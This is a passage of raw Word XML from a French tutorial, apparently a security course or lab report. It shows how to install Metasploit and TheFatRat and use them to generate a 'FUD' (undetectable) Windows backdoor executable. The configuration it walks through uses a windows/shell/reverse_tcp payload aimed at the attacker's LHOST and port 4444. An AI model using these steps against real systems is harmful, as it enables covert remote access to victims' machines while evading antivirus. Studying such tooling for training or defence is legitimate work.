      </w:r>
    </w:p>
    <w:p w14:paraId="56F7A58F" w14:textId="21CCF0DE" w:rsidR="003F382E" w:rsidRDefault="00B756E1" w:rsidP="00B756E1">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00B756E1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B50045B" wp14:editId="47C419A9">
            <wp:extent cx="4553585" cy="1781424"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="53" name="Picture 5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ext&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4553585" cy="1781424"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC99891" w14:textId="77777777" w:rsidR="001F3D24" w:rsidRDefault="001F3D24" w:rsidP="00B756E1">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5199CBF7" w14:textId="77777777" w:rsidR="00166A0B" w:rsidRDefault="00166A0B" w:rsidP="00B756E1">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="698B9E51" w14:textId="77777777" w:rsidR="00166A0B" w:rsidRDefault="00166A0B" w:rsidP="00B756E1">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E2DF69D" w14:textId="77777777" w:rsidR="00166A0B" w:rsidRDefault="00166A0B" w:rsidP="00B756E1">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56D5E3DD" w14:textId="77777777" w:rsidR="00166A0B" w:rsidRDefault="00166A0B" w:rsidP="00B756E1">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7189AB2A" w14:textId="77777777" w:rsidR="00166A0B" w:rsidRDefault="00166A0B" w:rsidP="00B756E1">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="262D8FCC" w14:textId="77777777" w:rsidR="00166A0B" w:rsidRDefault="00166A0B" w:rsidP="00B756E1">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="019BD9FA" w14:textId="77777777" w:rsidR="00166A0B" w:rsidRDefault="00166A0B" w:rsidP="00B756E1">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05C6CEF3" w14:textId="77777777" w:rsidR="00166A0B" w:rsidRDefault="00166A0B" w:rsidP="00B756E1">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="739C4BEB" w14:textId="77777777" w:rsidR="00166A0B" w:rsidRDefault="00166A0B" w:rsidP="00B756E1">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BF496BE" w14:textId="77777777" w:rsidR="00166A0B" w:rsidRDefault="00166A0B" w:rsidP="00B756E1">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63F7952A" w14:textId="77777777" w:rsidR="00166A0B" w:rsidRDefault="00166A0B" w:rsidP="00B756E1">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59029D74" w14:textId="77777777" w:rsidR="00166A0B" w:rsidRDefault="00166A0B" w:rsidP="00B756E1">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08A1C96D" w14:textId="77777777" w:rsidR="00166A0B" w:rsidRDefault="00166A0B" w:rsidP="00B756E1">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68C45565" w14:textId="77777777" w:rsidR="00166A0B" w:rsidRDefault="00166A0B" w:rsidP="00B756E1">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0598982E" w14:textId="77777777" w:rsidR="00166A0B" w:rsidRDefault="00166A0B" w:rsidP="00B756E1">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20327B47" w14:textId="77777777" w:rsidR="00166A0B" w:rsidRDefault="00166A0B" w:rsidP="00B756E1">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="478395D2" w14:textId="77777777" w:rsidR="00166A0B" w:rsidRDefault="00166A0B" w:rsidP="00B756E1">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E210083" w14:textId="77777777" w:rsidR="001F3D24" w:rsidRDefault="001F3D24" w:rsidP="003F382E">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F144BAE" w14:textId="55985F7E" w:rsidR="001F3D24" w:rsidRDefault="001F3D24" w:rsidP="001F3D24">
      <w:pPr>
        <w:pStyle w:val="EFmoduletitre"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc133586230"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Création du </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> avec </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TheFatRat</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="025C317E" w14:textId="2AC44886" w:rsidR="001F3D24" w:rsidRDefault="001F3D24" w:rsidP="001F3D24">
      <w:pPr>
        <w:pStyle w:val="EFtiquette"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc133586231"/>
      <w:r>
        <w:t>Installation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="31F6A66B" w14:textId="0A0484EF" w:rsidR="001F3D24" w:rsidRDefault="001F3D24" w:rsidP="001F3D24">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A70C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TheFatRat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> est un outil qui est </w:t>
      </w:r>
      <w:r w:rsidR="00022575">
        <w:t>dépendant</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A70C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Framework</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, il faut donc qu’il soit </w:t>
      </w:r>
      <w:r w:rsidR="00A70C19">
        <w:t>installé</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en premier si ce n’est pas déjà le cas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485A52C1" w14:textId="313CDA6E" w:rsidR="001F3D24" w:rsidRPr="001F3D24" w:rsidRDefault="00022575" w:rsidP="001F3D24">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022575">
        <w:t>apt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022575">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022575">
        <w:t>install</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022575">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022575">
        <w:t>metasploit-framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5DBD79" w14:textId="4E8B3303" w:rsidR="003F382E" w:rsidRDefault="00022575" w:rsidP="003F382E">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Puis nous installons </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A70C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TheFatRat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5B8C55A8" w14:textId="77777777" w:rsidR="00022575" w:rsidRPr="002F07BD" w:rsidRDefault="00022575" w:rsidP="00022575">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F07BD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>git clone httpss://github.com/Screetsec/TheFatRat.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BF023F" w14:textId="77777777" w:rsidR="00022575" w:rsidRPr="00022575" w:rsidRDefault="00022575" w:rsidP="00022575">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00022575">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cd TheFatRat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C5FA2A" w14:textId="77777777" w:rsidR="00022575" w:rsidRPr="00022575" w:rsidRDefault="00022575" w:rsidP="00022575">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022575">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00022575">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> +x setup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37366C43" w14:textId="511AD77A" w:rsidR="00022575" w:rsidRPr="003F382E" w:rsidRDefault="00022575" w:rsidP="00022575">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:r>
        <w:t>./setup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E16285" w14:textId="77777777" w:rsidR="00B756E1" w:rsidRDefault="00B756E1" w:rsidP="00166A0B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="058B8F1D" w14:textId="0D8A0343" w:rsidR="00022575" w:rsidRDefault="00022575" w:rsidP="00022575">
      <w:pPr>
        <w:pStyle w:val="EFtiquette"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc133586232"/>
      <w:r>
        <w:t>Création</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="0A051A3E" w14:textId="653FD845" w:rsidR="00022575" w:rsidRDefault="00A70C19" w:rsidP="00022575">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="00022575">
        <w:t>ous lançons l’outil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437E652F" w14:textId="7D2D7FF9" w:rsidR="00022575" w:rsidRPr="003F382E" w:rsidRDefault="00022575" w:rsidP="00022575">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00022575">
        <w:t>fatrat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1A7226A2" w14:textId="774A5502" w:rsidR="003F382E" w:rsidRDefault="00B756E1" w:rsidP="003F382E">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t>Nous arrivons sur cette interface :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79207B9F" w14:textId="4E27EBB5" w:rsidR="00B756E1" w:rsidRDefault="00B756E1" w:rsidP="00166A0B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00B756E1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="439C2F49" wp14:editId="47461747">
            <wp:extent cx="4370561" cy="5433060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="54" name="Picture 5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ext&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4384243" cy="5450068"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6357D8F3" w14:textId="376CD771" w:rsidR="00B756E1" w:rsidRDefault="00B756E1" w:rsidP="00B756E1">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Nous </w:t>
      </w:r>
      <w:r w:rsidR="00A70C19">
        <w:t>faisons</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> le choix </w:t>
      </w:r>
      <w:r w:rsidRPr="00B756E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">06] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Create</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Fud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Backdoor 1000% </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>PwnWinds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> [Excellent] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0A87AA" w14:textId="510A3CAB" w:rsidR="00B756E1" w:rsidRDefault="00B756E1" w:rsidP="00B756E1">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t>Et nous arrivons sur cette fenêtre :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDF6B02" w14:textId="0D3D7891" w:rsidR="00B756E1" w:rsidRPr="00B756E1" w:rsidRDefault="00B756E1" w:rsidP="00B756E1">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00B756E1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A470196" wp14:editId="777EA305">
            <wp:extent cx="5759450" cy="5350510"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="55" name="Picture 5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10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5759450" cy="5350510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="110DB72E" w14:textId="77777777" w:rsidR="003F382E" w:rsidRPr="003F382E" w:rsidRDefault="003F382E" w:rsidP="003F382E">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45B61107" w14:textId="77777777" w:rsidR="00087C41" w:rsidRDefault="00087C41" w:rsidP="00087C41"/>
    <w:p w14:paraId="479074B6" w14:textId="77777777" w:rsidR="00B756E1" w:rsidRDefault="00B756E1" w:rsidP="00087C41"/>
    <w:p w14:paraId="4E6C977C" w14:textId="77777777" w:rsidR="00B756E1" w:rsidRDefault="00B756E1" w:rsidP="00087C41"/>
    <w:p w14:paraId="15F699A1" w14:textId="77777777" w:rsidR="00B756E1" w:rsidRDefault="00B756E1" w:rsidP="00087C41"/>
    <w:p w14:paraId="02827D24" w14:textId="77777777" w:rsidR="00B756E1" w:rsidRDefault="00B756E1" w:rsidP="00087C41"/>
    <w:p w14:paraId="0B5EDABE" w14:textId="77777777" w:rsidR="00B756E1" w:rsidRDefault="00B756E1" w:rsidP="00087C41"/>
    <w:p w14:paraId="04090488" w14:textId="77777777" w:rsidR="00B756E1" w:rsidRDefault="00B756E1" w:rsidP="00087C41"/>
    <w:p w14:paraId="022AC874" w14:textId="77777777" w:rsidR="00B756E1" w:rsidRDefault="00B756E1" w:rsidP="00087C41"/>
    <w:p w14:paraId="5958B980" w14:textId="77777777" w:rsidR="00B756E1" w:rsidRDefault="00B756E1" w:rsidP="00087C41"/>
    <w:p w14:paraId="5613873F" w14:textId="77777777" w:rsidR="00B756E1" w:rsidRDefault="00B756E1" w:rsidP="00087C41"/>
    <w:p w14:paraId="6DDFD4BE" w14:textId="77777777" w:rsidR="00B756E1" w:rsidRDefault="00B756E1" w:rsidP="00087C41"/>
    <w:p w14:paraId="70DE5C41" w14:textId="0A512305" w:rsidR="00426C00" w:rsidRDefault="00B756E1" w:rsidP="00087C41">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Nous </w:t>
      </w:r>
      <w:r w:rsidR="00A70C19">
        <w:t>faisons</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> le choix </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">[02] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Create</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> exe file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> C# + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00426C00">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">(FUD 100%) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3A22B9" w14:textId="77777777" w:rsidR="00426C00" w:rsidRDefault="00426C00" w:rsidP="00087C41">
      <w:r>
        <w:t>Et nous renseignons les informations demandées :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEF2B2B" w14:textId="77777777" w:rsidR="00426C00" w:rsidRDefault="00426C00" w:rsidP="00426C00">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>LHOST : adresse IP de notre machine attaquante</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5982E5EF" w14:textId="174E4ACF" w:rsidR="00426C00" w:rsidRDefault="00426C00" w:rsidP="00426C00">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>LPORT : le port d’écoute (4444 par défaut sur le handler de Metasploit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475943D6" w14:textId="393071BC" w:rsidR="00B756E1" w:rsidRDefault="00426C00" w:rsidP="00426C00">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Le nom du </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> sans l’extension</w:t>
      </w:r>
      <w:r w:rsidR="00B756E1" w:rsidRPr="00426C00">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE09A1E" w14:textId="2942ECCA" w:rsidR="00426C00" w:rsidRPr="00426C00" w:rsidRDefault="00426C00" w:rsidP="00426C00">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Choisir le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">, dans notre cas nous choisissons le [ 2 ] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/shell/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1E339C31" w14:textId="76DFFDC4" w:rsidR="00B756E1" w:rsidRPr="003F382E" w:rsidRDefault="00B756E1" w:rsidP="00B756E1">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00B756E1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A17506D" wp14:editId="2531A8C6">
            <wp:extent cx="5677692" cy="4629796"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="56" name="Picture 5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ext&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5677692" cy="4629796"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68216C73" w14:textId="77777777" w:rsidR="00087C41" w:rsidRPr="003F382E" w:rsidRDefault="00087C41" w:rsidP="00087C41"/>
